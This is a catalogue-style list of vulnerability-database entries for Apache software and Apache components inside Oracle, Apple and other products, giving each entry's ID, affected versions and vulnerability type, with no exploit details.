| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
| [123197] Apache Sentry up to 2.0.0 privilege escalation
| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
| [122800] Apache Spark 1.3.0 REST API weak authentication
| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
| [121354] Apache CouchDB HTTP API Code Execution
| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
| [120168] Apache CXF weak authentication
| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
| [119306] Apache MXNet Network Interface privilege escalation
| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
| [118143] Apache NiFi activemq-client Library Deserialization denial of service
| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
| [117115] Apache Tika up to 1.17 tika-server command injection
| [116929] Apache Fineract getReportType Parameter privilege escalation
| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
| [116926] Apache Fineract REST Parameter privilege escalation
| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
| [115883] Apache Hive up to 2.3.2 privilege escalation
| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
| [115518] Apache Ignite 2.3 Deserialization privilege escalation
| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
| [113895] Apache Geode up to 1.3.x Code Execution
| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
| [113747] Apache Tomcat Servlets privilege escalation
| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
| [112885] Apache Allura up to 1.8.0 File information disclosure
| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
| [112625] Apache POI up to 3.16 Loop denial of service
| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
| [112339] Apache NiFi 1.5.0 Header privilege escalation
| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
| [112114] Oracle 9.1 Apache Log4j privilege escalation
| [112113] Oracle 9.1 Apache Log4j privilege escalation
| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
| [110701] Apache Fineract Query Parameter sql injection
| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
| [110106] Apache CXF Fediz Spring cross site request forgery
| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108938] Apple macOS up to 10.13.1 apache denial of service
| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108935] Apple macOS up to 10.13.1 apache denial of service
| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108931] Apple macOS up to 10.13.1 apache denial of service
| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108929] Apple macOS up to 10.13.1 apache denial of service
| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
| [108782] Apache Xerces2 XML Service denial of service
| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
| [108629] Apache OFBiz up to 10.04.01 privilege escalation
| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
| [107639] Apache NiFi 1.4.0 XML External Entity
| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
12451| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
12452| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
12453| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
12454| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
12455| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
12456| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
12457| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
12458| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12459| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12460| [107197] Apache Xerces Jelly Parser XML File XML External Entity
12461| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
12462| [107084] Apache Struts up to 2.3.19 cross site scripting
12463| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
12464| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
12465| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
12466| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
12467| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
12468| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
12469| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
12470| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
12471| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
12472| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
12473| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
12474| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
12475| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12476| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12477| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
12478| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
12479| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
12480| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
12481| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
12482| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
12483| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
12484| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
12485| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
12486| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
12487| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
12488| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
12489| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
12490| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
12491| [105878] Apache Struts up to 2.3.24.0 privilege escalation
12492| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
12493| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
12494| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
12495| [105643] Apache Pony Mail up to 0.8b weak authentication
12496| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
12497| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
12498| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
12499| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
12500| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
12501| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
12502| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
12503| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
12504| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
12505| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
12506| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
12507| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
| [103690] Apache OpenMeetings 1.0.0 sql injection
| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
| [103688] Apache OpenMeetings 1.0.0 weak encryption
| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
| [103352] Apache Solr Node weak authentication
| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
